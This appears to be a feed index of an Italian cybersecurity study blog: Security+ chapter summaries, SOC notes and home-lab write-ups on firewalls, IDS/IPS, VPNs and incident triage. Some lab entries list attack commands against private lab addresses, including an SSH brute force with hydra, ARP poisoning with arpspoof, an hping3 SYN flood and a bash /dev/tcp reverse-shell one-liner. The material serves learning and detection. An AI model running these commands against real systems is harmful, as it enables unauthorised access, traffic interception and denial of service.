u-random

Cap 07 - Protecting Against Advanced Attacks

Tue, 09 Jun 2026 00:00:00 +0000

Attacchi di rete avanzati (SYN flood, DNS attacks, on-path, replay) e secure coding: input validation, injection, memory vulnerabilities, XSS, code signing, scripting sicuro. Cap 7 Gibson SY0-701.

Cisco Packet Tracer: La Rete che Protegge Se Stessa

Mon, 08 Jun 2026 00:00:00 +0000

TL;DR

Una DMZ e' una zona di mezzo: esposta verso internet, isolata dalla LAN
Due firewall significa che anche se Sofia/nginx viene compromessa, Giulia/MySQL e' ancora protetta da FW2
Su ASA il traffico da security-level basso verso alto e' bloccato per default - non serve scrivere nessuna regola di blocco

▶ $ history

nameif - assegna nome logico all'interfaccia ASA (outside, dmz, inside)
security-level - livello di fiducia: 0=esterno, 50=DMZ, 100=LAN
route outside 0.0.0.0 0.0.0.0 x.x.x.x - default route su ASA
show nameif - interfacce ASA con security level

Perche' questo lab
#

corsobitcoin.com e' una piattaforma di corsi online. Ha iscritti, sessioni, video, dati di pagamento.

Cisco Packet Tracer: Cinque Router, Una Catena, Nessun GPS

Sun, 07 Jun 2026 00:00:00 +0000

TL;DR

Un router conosce solo le reti a cui e' direttamente collegato. Tutto il resto va detto esplicitamente con rotte statiche
Ogni router ha piu' IP - uno per ogni interfaccia. "Marco e' 10.0.0.2" e' incompleto: Marco e' anche 10.10.10.1
Le rotte statiche funzionano come indicazioni stradali: "se vuoi andare la', chiedi a lui"
Se manca una rotta il pacchetto si ferma - il TTL serve esattamente per questo

▶ $ history

ip route [rete] [maschera] [next-hop] - aggiunta rotta statica
show ip route - tabella di routing corrente
ping [ip] - test connettivita' end-to-end

Prima di toccare Linux voglio vedere il routing con gli occhi. In Linux i namespace sono invisibili - sono processi, non oggetti fisici. In Cisco Packet Tracer posso vedere i router come scatole, i cavi come linee, e guardare i pacchetti muoversi.

Cap 06 - Threat Actors, Malware & Common Attacks

Thu, 04 Jun 2026 00:00:00 +0000

Chi attacca, come attacca e con cosa: threat actors e loro motivazioni, vettori di attacco (message/file/supply chain), tipi di malware (ransomware, trojan, worm, rootkit, botnet), e basi del vulnerability management. Cap 6 Gibson SY0-701.

DLP e Wazuh

Thu, 04 Jun 2026 00:00:00 +0000

TL;DR

DLP fatto in casa: con 50 righe di Python e inotify monitoriamo in tempo reale la scrittura di file sensibili.
Pattern matching: uno switch match/case in Python 3.10+ intercetta SSN, carte di credito e codici fiscali.
Wazuh in Docker: integrazione con il manager tramite regole custom, superando i limiti di permessi e decodificatori.
Tre errori reali: come risolvere il blocco PEP 668 su Ubuntu 24.04, i permessi di docker cp e l'errore del decoder syslog.

▶ $ history

python3 -m venv ~/dlp-venv
source ~/dlp-venv/bin/activate
pip install inotify
docker cp single-node-wazuh.manager-1:/var/ossec/etc/rules/local_rules.xml ./local_rules.xml
docker exec single-node-wazuh.manager-1 chown wazuh:wazuh /var/ossec/etc/rules/local_rules.xml
tail -f /var/log/syslog

Apro la dashboard Wazuh. Nella colonna full_log c'è scritto:

iptables - Linux Packet Filtering

Thu, 04 Jun 2026 00:00:00 +0000

Firewall nativo del kernel Linux. Gestisce il traffico di rete tramite chain (INPUT, OUTPUT, FORWARD) e tabelle (filter, nat, mangle). UFW e nftables sono frontend/successori.

ESP cifra, AH no: IPsec visto dal vivo

Sat, 30 May 2026 00:00:00 +0000

TL;DR

IPsec Suite: Una suite di protocolli di rete sicuri (IKE + ESP + AH) implementata a livello IP per garantire autenticazione, integrità e riservatezza.
IKE (Internet Key Exchange): Negozia gli algoritmi di sicurezza e stabilisce le Security Association (SA) scambiando chiavi tramite Diffie-Hellman (UDP 500/4500).
ESP (Encapsulating Security Payload): Cifra il payload dei pacchetti (ad es. con AES-256) garantendo riservatezza ed autenticazione. Supporta il NAT tramite incapsulamento NAT-T.
AH (Authentication Header): Firma crittograficamente i pacchetti per garantirne l'integrità, ma non cifra il payload, lasciando i dati in chiaro ed esposti allo sniffing.
Tunnel vs Transport: Tunnel mode cifra l'intero pacchetto originale aggiungendo un nuovo header IP (ideale per VPN Site-to-Site); Transport mode cifra solo il payload (ideale per host-to-host).

▶ $ history

apt install strongswan -y
ipsec version
ipsec restart
ipsec up mustache
ipsec statusall
tcpdump -i enp0s1 udp port 500
tcpdump -i enp0s1 proto 50
tcpdump -i enp0s1 proto 51 -v
ping 192.168.64.3

Configurare IPsec host-to-host con StrongSwan e vedere con tcpdump la differenza tra ESP e AH. ESP cifra il payload - AH no. Questa distinzione è una domanda classica Security+ e fondamentale per la sicurezza di rete.

Il Tunnel che Sceglie: Split vs Full VPN con WireGuard

Sat, 30 May 2026 00:00:00 +0000

TL;DR

WireGuard: VPN moderna basata su Curve25519 e ChaCha20, integrata direttamente nel kernel Linux come interfaccia di rete virtuale (wg0).
VPN Concentrator: Il dispositivo (in questo lab Ubuntu) che termina il tunnel cifrato, decifra il traffico e lo instrada verso la rete interna.
Split Tunnel (AllowedIPs = 10.0.0.0/24): Solo il traffico destinato alla subnet della VPN passa nel tunnel; il traffico internet esce in chiaro tramite il gateway locale.
Full Tunnel (AllowedIPs = 0.0.0.0/0): Tutto il traffico, incluso quello internet, viene convogliato nel tunnel cifrato e richiede IP forwarding e MASQUERADE sul concentratore.
Visibilità di rete: tcpdump/tshark mostrano solo pacchetti UDP cifrati sull'interfaccia fisica (enp0s1), mentre svelano il traffico ICMP/IP decifrato su quella virtuale (wg0).

▶ $ history

apt install wireguard -y
wg genkey | tee privatekey | wg pubkey > publickey
wg-quick up wg0
wg-quick down wg0
ip route show
traceroute 8.8.8.8
tcpdump -i wg0
tcpdump -i enp0s1 udp port 51820
tshark -r capture.pcap

Configurare un tunnel WireGuard tra due VM e vedere con i propri occhi la differenza tra split tunnel e full tunnel. Non teoria - routing table e traceroute che lo dimostrano empiricamente.

Cap 05 - Securing Hosts and Data

Fri, 29 May 2026 00:00:00 +0000

Sette superfici di attacco in un capitolo: virtualizzazione (VM Escape, VM Sprawl, container), hardening endpoint (TPM, HSM, UEFI Secure Boot, patch, baseline), protezione dati (at rest/transit/in use, DLP, FDE, database encryption), cloud (SaaS/PaaS/IaaS shared responsibility, CASB, SWG, IaC, SDN, edge/fog), mobile (BYOD/COPE/CYOD, MDM, jailbreak, sideloading), IoT e sistemi embedded (SoC, RTOS, vincoli), ICS/SCADA (CIA invertita, air-gap, Stuxnet). Cap 5 Gibson SY0-701.

Il Kernel Sospende il Giudizio

Fri, 29 May 2026 00:00:00 +0000

TL;DR

IDS (af-packet): copia del traffico → Suricata vede tutto, non può bloccare niente → [**] in fast.log
IPS (nfqueue): traffico originale trattenuto → il kernel aspetta il verdetto → [Drop] in fast.log
iptables -I INPUT -j NFQUEUE --queue-num 0 è la singola regola che trasforma il sistema
fail-open: no = fail-closed: se Suricata muore, tutto il traffico viene droppato
Il Docker bridge (br-XXXX) bypassa NFQUEUE - la SYN-ACK di ritorno viene bloccata e Wazuh si disconnette
La persistenza al reboot richiede un systemd service dedicato (non iptables-persistent, che rimuove UFW)

▶ $ history

suricata -T -c /etc/suricata/suricata.yaml -v
suricata-update
iptables -I INPUT 1 -j NFQUEUE --queue-num 0
iptables -L INPUT -n -v --line-numbers
nmap --min-rate 1000 -p 1-1000 192.168.64.3
hping3 -S --flood 192.168.64.3
cat /proc/net/tcp

Voglio vedere cosa succede quando Suricata non si limita a guardare il traffico, ma lo blocca davvero.

816 tentativi zero successi

Wed, 27 May 2026 00:00:00 +0000

TL;DR

HIDS (Wazuh agent) monitora il singolo host dall'interno - log, file, processi.
SIEM (Wazuh manager) raccoglie tutto, correla, genera alert.
HIPS (fail2ban) agisce automaticamente dopo la detection - blocca l'IP attaccante.
IDS e IPS non sono prodotti diversi: è la stessa categoria, con o senza capacità di blocco.

▶ $ history

hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://192.168.64.3 -t 4
tail -f /var/log/auth.log
tail -f /var/log/fail2ban.log

Il lab è semplice: Ubuntu con Wazuh, Kali con Hydra, una wordlist da 14 milioni di password. Obiettivo: vedere cosa succede dall'altra parte quando un attaccante tenta il brute force SSH.

IDS e IPS - detection e prevention, host e rete

Wed, 27 May 2026 00:00:00 +0000

IDS rileva, IPS blocca. HIDS/HIPS agiscono sull'host, NIDS/NIPS sulla rete. La differenza inline/non-inline determina quando il blocco avviene.

Cap 4 - Securing Your Network

Mon, 25 May 2026 00:00:00 +0000

IDS/IPS, VPN (IPsec/SSL), tunneling, wireless security (WPA2/WPA3), network segmentation avanzata. Cap 4 Gibson SY0-701.

Il Campo che Parlava Troppo

Tue, 19 May 2026 00:00:00 +0000

TL;DR

SQL Injection avviene quando l'input utente viene concatenato direttamente nella query - il DB esegue codice che non dovrebbe
Un apostrofo nel campo username è spesso sufficiente per rilevare la vulnerabilità
La difesa corretta è la parameterized query - non l'input validation da sola
Il WAF può rallentare l'attacco ma non sostituisce il fix nel codice

▶ $ history

curl -s -X POST url -d "username=test&password=test"
tshark -r capture.pcap -Y "http.request.method == POST"

Mi hanno dato tre ore e un URL. Un'applicazione web interna - gestionale ordini, usato dal reparto commerciale. "Testala. Dimmi cosa non va."

Il CEO Non Ha Scritto Quella Email

Tue, 19 May 2026 00:00:00 +0000

TL;DR

BEC (Business Email Compromise) non richiede malware - basta falsificare il campo From: in SMTP
SPF, DKIM e DMARC sono i tre record DNS che rendono verificabile l'identità del mittente
Un dominio senza questi tre record è impersonabile in cinque minuti da chiunque
Leggere gli header Received: di un'email dal basso verso l'alto rivela il percorso reale del messaggio

▶ $ history

dig TXT dominio.com
dig TXT _dmarc.dominio.com

Arianna gestisce i pagamenti. Quella mattina ha ricevuto un'email dal CEO: cambio fornitore urgente, nuovo IBAN, bonifico entro fine giornata. 47.000 euro. Il tono era quello di sempre - formale, diretto, niente spiegazioni superflue.

Il Fantasma nella Rete

Tue, 19 May 2026 00:00:00 +0000

TL;DR

Un honeypot è un sistema esca - qualsiasi connessione ricevuta è per definizione sospetta
La ricognizione interna (lateral movement iniziale) lascia tracce nei log prima che l'attaccante agisca
Analizzare chi ha contattato il honeypot rivela quali host sono compromessi o controllati da un attaccante
IDS/IPS signature-based non rileva zero-day - il comportamento anomalo verso risorse inesistenti lo fa

▶ $ history

tshark -r capture.pcap -Y "ip.dst == 192.168.10.99" -T fields -e ip.src -e tcp.dstport
dig -x 192.168.10.99

Sono le 14:33. Il SIEM ha flaggato una connessione TCP verso 192.168.10.99. Il problema: a quell'IP non c'è nessun server. Non c'è nessun servizio. Non c'è nessun device registrato nell'inventario.

Il Postino Lavora di Notte

Tue, 19 May 2026 00:00:00 +0000

TL;DR

SMTP consegna le email, IMAP/POP3 le recuperano - protocolli separati con porte e ruoli distinti
Una workstation che apre connessioni dirette sulla porta 25 è anomala: quel traffico spetta al mail server aziendale
base64 negli allegati non è cifratura: su SMTP senza TLS, qualsiasi allegato è estraibile dal pcap in chiaro
SPF, DKIM e DMARC sono i tre record DNS che distinguono un dominio difeso da uno esposto allo spoofing

▶ $ history

tshark -r capture.pcap -Y "smtp" -T fields -e ip.src -e ip.dst -e smtp.req.command -e smtp.req.parameter
dig MX dominio.com
dig TXT _dmarc.dominio.com

Tutti Potevano Leggere Tutto

Tue, 19 May 2026 00:00:00 +0000

TL;DR

DAC = il proprietario del file decide i permessi - flessibile ma dipende dall'utente
MAC = il sistema decide in base a etichette di classificazione - usato in ambienti ad alta sicurezza
RBAC = permessi assegnati ai ruoli, utenti assegnati ai ruoli - il modello più usato in azienda
Rule-based = regole condizionali (orario, IP, dispositivo) - usato nei firewall e nel controllo accessi contestuale
ABAC = combina attributi utente + risorsa + contesto - il più granulare, il più complesso

Giovedì mattina. Silvia, amministrativa HR, apre la share aziendale per caricare un documento. Trova una cartella che non riconosce. La apre. Dentro ci sono i file di stipendio di tutti i 140 dipendenti dell'azienda - compresi quelli dei dirigenti.

Cap 3 - Network Technologies and Security Architecture

Mon, 18 May 2026 00:00:00 +0000

OSI model, protocolli base (TCP/UDP/IP/ICMP/ARP/DNS/DHCP/NTP), protocolli sicuri vs insicuri, SSL/TLS, firewall (stateless/stateful/WAF/NGFW), screened subnet, Zero Trust, proxy, NAT, VLAN, NAC, UTM, SASE, Group Policy, GDLP, SPF/DKIM/DMARC. Cap 3 Gibson SY0-701.

Well-Known Ports - Security+

Mon, 18 May 2026 00:00:00 +0000

Porte da sapere a memoria per Security+ SY0-701. Organizzate per categoria: file transfer, remote access, email, web, directory, network services, database, VPN/IPSec.

Well-Known Ports - Security+

Mon, 18 May 2026 00:00:00 +0000

Porte da sapere a memoria per Security+ SY0-701. Organizzate per categoria: file transfer, remote access, email, web, directory, network services, database, VPN/IPSec.

Cap 2 - Identity and Access Management

Fri, 15 May 2026 00:00:00 +0000

Autenticazione (4 fattori, biometria, MFA), SSO/LDAP/SAML/OAuth, modelli autorizzazione (RBAC/DAC/MAC/ABAC), account lifecycle, PAM, authentication indicators. Cap 2 Gibson SY0-701.

Cap 1 - Security Fundamentals

Wed, 13 May 2026 00:00:00 +0000

CIA Triad, Risk Concepts, Security Controls (categorie e tipi), Logs e SIEM. Capitolo 1 del Gibson SY0-701.

Ruoli Aziendali - C-Suite e figure Security

Mon, 11 May 2026 00:00:00 +0000

Mappa delle figure dirigenziali e dei ruoli security in un'organizzazione. Utile per domande di governance e GRC sul Security+.

Bash Reverse Shell - Anatomia del comando

Sun, 10 May 2026 00:00:00 +0000

Analisi del comando bash -i >& /dev/tcp/IP/PORT 0>&1 - come funzionano i redirect di file descriptor e il pseudo-device /dev/tcp.

Kernel e Syscall - User Space vs Kernel Space

Sun, 10 May 2026 00:00:00 +0000

Il kernel è il nucleo del sistema operativo. Le syscall sono l'interfaccia tra programmi utente e kernel. Architetture diverse (ARM64, x86_64) hanno numeri di syscall diversi.

Operational Plans - DRP, IRP, BCP, Change Management

Sun, 10 May 2026 00:00:00 +0000

Distinzione tra i piani operativi: Disaster Recovery Plan, Incident Response Plan, Business Continuity Plan e Change Management. Termini D4/D5 Security+ frequenti.

Risk Management - Termini chiave

Sun, 10 May 2026 00:00:00 +0000

Distinzione tra risk register, risk tolerance, risk transfer e risk analysis. Termini D5 Security+ che escono spesso nelle domande.

Security Controls - Tipi e Funzioni

Sun, 10 May 2026 00:00:00 +0000

Classificazione dei controlli di sicurezza per tipo (Technical/Administrative/Physical) e per funzione (Preventive/Detective/Corrective/Compensating/Deterrent/Directive).

Frame, Pacchetto, Segmento - OSI e Stream

Thu, 07 May 2026 00:00:00 +0000

Differenza tra frame (L2), pacchetto IP (L3) e segmento TCP (L4). Matrioska OSI, NIC, stream indipendenti per livello. Base per leggere correttamente tshark e Wireshark.

Glossario Inglese - Parole che scordo

Thu, 07 May 2026 00:00:00 +0000

Dizionario personale di termini inglesi tecnici e non che ricorrono nei testi Security+ e BTL1. Aggiornato durante le sessioni di ripasso.

Incident Response - Modiga cap 9 - Analisi e risposta agli incidenti

Wed, 06 May 2026 00:00:00 +0000

Gestione degli incidenti secondo Modiga cap 9: fasi IH, detection, analisi, prioritizzazione, SIEM tuning, containment. Nota in corso - p. 509.

SOC - Struttura e Organizzazione

Mon, 04 May 2026 00:00:00 +0000

Struttura operativa di un SOC: tier, ruoli specializzati, modelli di deployment (interno/esterno/ibrido), SLA, KPI, differenza SOC vs NOC.

iptables - Netfilter firewall Linux

Sun, 03 May 2026 00:00:00 +0000

Motore firewall del kernel Linux basato su Netfilter. Organizza le regole in chain (INPUT, OUTPUT, FORWARD). UFW è un frontend che traduce comandi semplici in regole iptables.

ufw - Uncomplicated Firewall

Sun, 03 May 2026 00:00:00 +0000

Frontend semplificato per iptables su Ubuntu/Debian. Gestisce regole firewall in entrata e uscita con comandi leggibili. Default policy: nega tutto il traffico in entrata quando abilitato.

whois

Sun, 03 May 2026 00:00:00 +0000

Interroga i database WHOIS per ottenere informazioni su un IP o dominio: ASN, organizzazione, paese, range di indirizzi, abuse contact.

Wazuh + auditd: rilevare una reverse shell con regola custom

Sat, 02 May 2026 00:00:00 +0000

Come integrare auditd con Wazuh (Docker) per rilevare bash /dev/tcp: architettura agent/manager, permessi, formato log, regola XML custom.

DNS e HTTP in una LAN con switch

Fri, 01 May 2026 00:00:00 +0000

Come funziona la risoluzione DNS e la richiesta HTTP in una LAN flat con switch, senza router né gateway.

Routing statico e topologia LAN-internet

Fri, 01 May 2026 00:00:00 +0000

Come configurare il routing statico su router Cisco per connettere una LAN privata a una rete pubblica simulata, con DNS e HTTP server esterni.

DNS Tunneling

Wed, 29 Apr 2026 00:00:00 +0000

Tecnica C2 che usa il protocollo DNS per trasportare comandi e dati esfiltrati, bypassando i firewall perche' UDP 53 e' quasi sempre permesso.

RJ-45 e Cavi Ethernet - Pinout, Dritti e Incrociati

Wed, 29 Apr 2026 00:00:00 +0000

Il connettore RJ-45 ha 8 pin con ruoli TX/RX distinti. I cavi dritti collegano dispositivi diversi, i cavi incrociati collegano dispositivi uguali. Il segnale elettrico codifica i bit tramite variazioni di tensione.

Incident Response - Framework e Lifecycle

Tue, 28 Apr 2026 00:00:00 +0000

Definizione di IR, confronto framework (NIST, PICERL, MITRE ATT&CK, Time Based Security) e dettaglio operativo delle fasi PICERL con checklist.

IP Addressing & Subnetting

Tue, 28 Apr 2026 00:00:00 +0000

L'indirizzamento IP definisce l'identità di una macchina in rete (IP) e il confine del suo quartiere (Subnet Mask). RFC1918, broadcast, segmentazione Blue Team.

IP Subnetting - Matematica e Routing

Tue, 28 Apr 2026 00:00:00 +0000

Matematica del subnetting: formula host 2^n-2, calcolo binario, conversione CIDR/mask, /32, routing table e flusso pacchetto attraverso router.

MITRE ATT&CK Framework

Tue, 28 Apr 2026 00:00:00 +0000

Adversarial Tactics, Techniques, and Common Knowledge. Matrice globale per la tassonomia dei comportamenti avversari, con guida operativa all'uso in un SOC.

docker volume

Mon, 27 Apr 2026 00:00:00 +0000

Comandi per gestire volumi Docker: ispezione, creazione, rimozione, migrazione dati tra volumi.

Command Injection

Sun, 26 Apr 2026 00:00:00 +0000

Vulnerabilità A03 OWASP: input utente viene passato a una shell di sistema senza sanitizzazione. Permette esecuzione arbitraria di comandi sul server.

df - disk free

Sun, 26 Apr 2026 00:00:00 +0000

Mostra lo spazio disponibile e usato sui filesystem montati. Primo comando da eseguire quando il disco sembra pieno o un servizio si blocca per spazio insufficiente.

du

Sun, 26 Apr 2026 00:00:00 +0000

Stima e visualizza lo spazio occupato da file e directory sul filesystem. Usato con sort per trovare chi occupa spazio — primo step dopo df quando il disco è pieno.

Heredoc - blocco di testo come stdin

Sun, 26 Apr 2026 00:00:00 +0000

Sintassi bash per passare blocchi di testo multiriga come stdin a un comando. Usato con sudo tee per scrivere file di sistema.

netcat

Sun, 26 Apr 2026 00:00:00 +0000

Utility versatile per leggere e scrivere dati attraverso connessioni di rete TCP e UDP. Usato per banner grabbing, port scan, trasferimento file, e come listener per reverse shell.

Reverse Shell

Sun, 26 Apr 2026 00:00:00 +0000

Tecnica di accesso remoto dove la vittima si connette verso l'attaccante. Bypassa i firewall in ingresso. Rilevabile con auditd, Suricata o regole Wazuh custom.

tee - duplica stdout su file

Sun, 26 Apr 2026 00:00:00 +0000

Legge da stdin e scrive contemporaneamente su stdout e su file. Usato con sudo per scrivere file di sistema senza aprire editor come root.

file-descriptor

Thu, 23 Apr 2026 00:00:00 +0000

I tre canali standard aperti in ogni processo Unix: stdin (0), stdout (1), stderr (2). Fondamentali per capire pipe, redirezione e comportamento dei tool da terminale.

Architettura di Wazuh SIEM/XDR

Wed, 22 Apr 2026 00:00:00 +0000

Analisi dei componenti core di Wazuh: Agent, Manager, Indexer e Dashboard. Funzionamento del flusso di telemetria.

BGP e Autonomous Systems (AS) - Il GPS di Internet

Wed, 22 Apr 2026 00:00:00 +0000

Guida completa al routing globale: gerarchia delle reti, analogia delle Città-Stato, differenze tra IGP/eBGP/iBGP e analisi del BGP Hijacking.

EICAR Test File - Lo standard per il test malware

Wed, 22 Apr 2026 00:00:00 +0000

Una stringa standard di 68 caratteri utilizzata per testare il corretto funzionamento di antivirus, EDR e SIEM senza usare codice malevolo reale.

Indirizzi IP e Listening Ports - Guida SOC

Wed, 22 Apr 2026 00:00:00 +0000

Interpretazione degli indirizzi IP (0.0.0.0, 127.0.0.1, ::) e delle porte in ascolto durante l'investigazione SOC.

Le Autostrade di Internet

Wed, 22 Apr 2026 00:00:00 +0000

TL;DR

Internet non è una singola rete: è un insieme di reti indipendenti (Autonomous Systems) collegate da BGP
BGP decide il percorso tra AS diversi - IGP gestisce il routing interno, iBGP sincronizza i border router
Un attaccante può annunciare rotte false (BGP Hijacking) e dirottare traffico globale
Ogni IP appartiene a un ASN: saperlo leggere è un'abilità base di triage SOC

▶ $ history

whois [IP]
whois [IP] | grep -i "origin|asn|orgname"

lsof - list open files

Wed, 22 Apr 2026 00:00:00 +0000

Elenca tutti i file aperti dal sistema. Fondamentale in incident response per trovare processi sospetti, connessioni anomale e file nascosti (deleted).

Rootkit - Il malware invisibile

Wed, 22 Apr 2026 00:00:00 +0000

Set di strumenti malevoli progettati per nascondere processi, file e connessioni di rete, spesso operando a livello di Kernel.

TCP Reliability e Modello OSI - La Guida Semplificata

Wed, 22 Apr 2026 00:00:00 +0000

Spiegazione del meccanismo di conferma (ACK) del TCP e mappatura semplificata degli strati OSI (Layer 2, 3, 4) per l'analisi dei log.

Glossario Cyber & SOC

Mon, 20 Apr 2026 00:00:00 +0000

Dizionario centrale degli acronimi e dei termini tecnici incontrati durante il percorso da Developer a SOC Specialist.

Investigazione Incidenti Linux - Cheat Sheet

Mon, 20 Apr 2026 00:00:00 +0000

Comandi essenziali per l'identificazione di anomalie, processi malevoli e connessioni sospette su sistemi UNIX/Linux.

Investigazione Incidenti Windows - Cheat Sheet

Mon, 20 Apr 2026 00:00:00 +0000

Comandi e strumenti essenziali per rilevare anomalie, persistenza e account sospetti in ambiente Windows.

SOC Tiers - Ruoli e Responsabilità

Mon, 20 Apr 2026 00:00:00 +0000

Livelli gerarchici del SOC, attività operative Tier 1-3, impatto dell'AI (SOC 2.0) e vantaggi del background da Developer.

Docker Network

Sat, 18 Apr 2026 00:00:00 +0000

Docker crea reti virtuali isolate tra container. I container sulla stessa rete si vedono per nome (DNS interno). Quelli su reti diverse non si parlano - isolamento per design.

HTTP in Wireshark - TCP Segmentation e Packet Analysis

Fri, 17 Apr 2026 00:00:00 +0000

Come appare una sessione HTTP in Wireshark: TCP segmentation, MSS, Nagle's algorithm, gzip. Prospettiva packet analysis.

SMTP - Simple Mail Transfer Protocol

Fri, 17 Apr 2026 00:00:00 +0000

SMTP trasporta le email tra server. Architettura MUA/MTA, porte, flusso di consegna, email spoofing e meccanismi difensivi SPF/DKIM/DMARC.

/etc/network/interfaces - configurazione rete Debian/Kali

Thu, 16 Apr 2026 00:00:00 +0000

File di configurazione rete su Debian e derivate (Kali). Definisce interfacce, IP statico o DHCP, gateway. Letto all'avvio dal servizio networking.

DHCP - Dynamic Host Configuration Protocol

Thu, 16 Apr 2026 00:00:00 +0000

Protocollo che assegna automaticamente configurazione di rete ai dispositivi che si connettono - IP address, subnet mask, gateway, DNS. Senza DHCP ogni dispositivo dovrebbe essere configurato manualmente.

OWASP Top 10

Thu, 16 Apr 2026 00:00:00 +0000

Framework di classificazione delle 10 vulnerabilità web più critiche. Usato dai SOC analyst per categorizzare gli attacchi nei log e nei report.

Unicast, Broadcast, Multicast

Thu, 16 Apr 2026 00:00:00 +0000

I tre modi in cui un pacchetto può essere indirizzato in rete: a uno solo (unicast), a tutti (broadcast), a un gruppo (multicast).

Command Chaining e Grouping

Wed, 15 Apr 2026 00:00:00 +0000

Metodi per concatenare piu' comandi in un'unica riga di comando e gestire il flusso dell'output.

I Confini della Visibilità: Pubblico vs Privato

Wed, 15 Apr 2026 00:00:00 +0000

Analisi dei tre pilastri (Document Root, Permessi, Configurazione) che determinano cosa e' esposto sul web e come i container aggiungono un ulteriore strato di isolamento.

Path Traversal

Wed, 15 Apr 2026 00:00:00 +0000

Vulnerabilita' che permette a un attaccante di leggere file arbitrari sul server manipolando parametri che costruiscono percorsi di file.

Docker - UID, permessi e volumi bind mount

Mon, 13 Apr 2026 00:00:00 +0000

Il problema fondamentale dei bind mount Docker: l'UID dell'utente host e l'UID dell'utente container non coincidono, causando errori di permesso sui file montati. Soluzione: entrypoint dinamico che crea l'utente con il UID corretto a runtime.

Alternative a man (Cheatsheet)

Sun, 12 Apr 2026 00:00:00 +0000

Panoramica delle risorse alternative ai manuali ufficiali (man) per consultare rapidamente esempi pratici di comandi CLI.

IPv6 - Internet Protocol Version 6

Fri, 10 Apr 2026 00:00:00 +0000

Successore di IPv4 a 128 bit. Elimina la scarsità di indirizzi, rimuove il broadcast, introduce multicast nativo, header fisso a 40 byte. Adozione globale ~45-49% (2026). Richiede firewall esplicito - niente NAT implicito.

MTU - Maximum Transmission Unit

Fri, 10 Apr 2026 00:00:00 +0000

Maximum Transmission Unit - la dimensione massima in byte del payload di un frame su un link fisico. Opera a Layer 2. Determina se un pacchetto IP deve essere frammentato o se il mittente deve ridurre la dimensione dei dati.

NDP - Neighbor Discovery Protocol

Fri, 10 Apr 2026 00:00:00 +0000

Protocollo IPv6 che sostituisce ARP. Usa ICMPv6 e multicast invece di broadcast per trovare il MAC address di un host nella stessa LAN. Neighbor Solicitation (type 135) chiede, Neighbor Advertisement (type 136) risponde.

SQL Injection (SQLi)

Fri, 10 Apr 2026 00:00:00 +0000

Vulnerabilità web che permette di manipolare le query database tramite input non sanificati, bypassando i controlli di sicurezza.

arpspoof - ARP cache poisoning tool

Thu, 09 Apr 2026 00:00:00 +0000

Tool per ARP poisoning — manda pacchetti ARP falsi in loop per avvelenare la cache ARP di un target. Usato per simulare attacchi MITM in laboratorio e capire come rilevarli.

Il Gateway Sono Io

Thu, 09 Apr 2026 00:00:00 +0000

TL;DR

ARP non ha autenticazione - chiunque può convincere una rete che il gateway è lui
Per fare un MITM silenzioso servono tre passi: IP forwarding, avvelenare entrambi i lati, disabilitare ICMP Redirect
La firma del MITM in Wireshark è inequivocabile: stesso pacchetto, stesso seq number, TTL decrementato di 1
ip route flush all su una macchina remota equivale a spegnerla - lezione imparata a caro prezzo

▶ $ history

arpspoof -i eth0 -t 192.168.64.3 192.168.64.1
sysctl -w net.ipv4.ip_forward=1
sysctl -w net.ipv4.conf.all.send_redirects=0
sysctl -w net.ipv4.conf.eth0.send_redirects=0
ip neighbor show
tcpdump -i eth0 -n 'host 192.168.64.3 and icmp' -c 10

Sono le 21:00. Il lab è acceso da qualche ora. Ho appena finito di leggere come funziona il Gratuitous ARP - quella tecnica dove un dispositivo annuncia a tutta la rete "questo IP sono io", senza che nessuno lo abbia chiesto.

IP Header e IPv4

Thu, 09 Apr 2026 00:00:00 +0000

Struttura dell'header IPv4: campi principali, TTL, frammentazione, checksum. IPv4 opera a Layer 3 e si occupa del routing tra reti diverse. Diverso da MAC che opera solo nella LAN.

sysctl - configure kernel parameters at runtime

Thu, 09 Apr 2026 00:00:00 +0000

Legge e modifica parametri del kernel Linux a runtime senza riavviare. Usato per abilitare IP forwarding, disabilitare ICMP redirect, e configurare parametri di rete e sicurezza.

Docker Volumes

Wed, 08 Apr 2026 00:00:00 +0000

Meccanismo di persistenza dei dati in Docker. I volumi sopravvivono al ciclo di vita dei container e possono essere condivisi tra piu container.

SSL/TLS

Tue, 07 Apr 2026 00:00:00 +0000

Protocollo che cifra le connessioni di rete. TLS handshake, catena CA, Perfect Forward Secrecy, post-quantum cryptography. Confronto con SSH.

tshark - terminal Wireshark

Sun, 05 Apr 2026 00:00:00 +0000

Wireshark da terminale. Stessa logica e stessi filtri display di Wireshark GUI, ma tutto da riga di comando. Cattura traffico live o analizza file .dfir. Indispensabile su server senza GUI e per automatizzare analisi con script bash.

nmap - Network Mapper

Fri, 03 Apr 2026 00:00:00 +0000

Mappa la rete mandando pacchetti TCP/UDP/ICMP verso host e porte target e analizza le risposte. Da un singolo SYN capisce se una porta e' aperta, chiusa o filtrata. Strumento standard per asset discovery, port scanning e audit di sicurezza.

La Lettera che Cambia Busta

Thu, 02 Apr 2026 00:00:00 +0000

TL;DR

traceroute -n 8.8.8.8 mostra i 14 router tra te e Google - ogni riga è un salto (hop)
IP address = destinazione finale, non cambia mai; MAC address = tratto corrente, cambia ad ogni hop
Il router legge l'IP dentro (la lettera), riscrive il MAC fuori (la busta) e passa il pacchetto al prossimo salto
* * * non significa percorso interrotto - solo che quel router non risponde a ICMP/UDP; prova con -T (TCP)

▶ $ history

traceroute -n 8.8.8.8
traceroute -I -n 8.8.8.8
sudo traceroute -T google.com
ip neighbor show
ip route show

Sistema: Linux (testato su Kali 2024 e Ubuntu 24.04) Tools: traceroute, ip - già installati di default Conoscenze: nessuna - si parte da zero

Il Processo che Non Dorme Mai

Wed, 01 Apr 2026 00:00:00 +0000

TL;DR

Alert alle 2:47: processo bash con connessione aperta verso IP esterno su porta 4444 → reverse shell attiva
ss -tnp | grep ESTABLISHED identifica il processo e il PID in tempo reale
tcpdump -i eth0 -n -A legge il payload in chiaro: comandi dell'attaccante visibili direttamente
Prima di bloccare: raccogliere history, auth.log, find -mmin -120 - agire troppo presto distrugge le prove

▶ $ history

ss -tnp
tcpdump -i eth0 -n -A host 185.220.101.34
ip a
history
grep "185.220.101.34" /var/log/auth.log
find / -mmin -120 -type f 2>/dev/null
kill -9 [PID]
ufw deny from [IP]

Cosa succede davvero sulla rete mentre il tuo codice gira

Tue, 31 Mar 2026 00:00:00 +0000

TL;DR

Prima di ogni richiesta HTTP il kernel fa un handshake in 3 pacchetti: SYN → SYN+ACK → ACK
I flag TCP ([S], [S.], [.], [P.], [R], [F]) si leggono tutti in tcpdump in tempo reale
RST = chiusura brusca (porta chiusa, firewall, crash) - molti RST consecutivi sono segnale sospetto
